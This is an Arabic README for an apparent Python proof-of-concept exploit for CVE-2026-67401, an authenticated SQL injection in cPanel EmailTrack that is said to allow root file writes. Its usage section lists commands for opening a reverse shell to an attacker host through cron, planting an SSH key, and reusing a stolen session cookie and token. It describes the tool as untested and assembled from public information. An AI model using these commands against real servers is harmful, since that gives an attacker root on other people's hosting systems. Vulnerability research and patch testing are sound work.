
إثبات مفهوم بلغة بايثون لثغرة CVE-2026-67401، وهي حقن SQL مُصادق عليه في cPanel EmailTrack يسمح بكتابة ملفات عشوائية بصلاحيات الجذر عبر SQLite ATTACH DATABASE، مما يتيح إنشاء قشرة عكسية أو إسقاط مفتاح SSH.
حقن SQL في cPanel EmailTrack. مستخدم cPanel موثّق بصلاحيات بريد يكتب ملفات عشوائية كجذر عبر SQLite ATTACH DATABASE. طلب واحد للوصول إلى الجذر. لم يتم اختباره على هدف حقيقي، الكود مُجمّع فقط من معلومات عامة وفحص فروقات أساسي. قم بواجبك كباحث وجرّبه وأرسل إصلاحات عبر PR.
يؤثر على جميع إصدارات cPanel/WHM قبل تصحيح 8 سبتمبر 2026.
requests# صدفة عكسية عبر cron
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
# إسقاط مفتاح SSH
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
# جلسة موجودة
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
# تشغيل تجريبي (طباعة الطلب دون إرساله)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1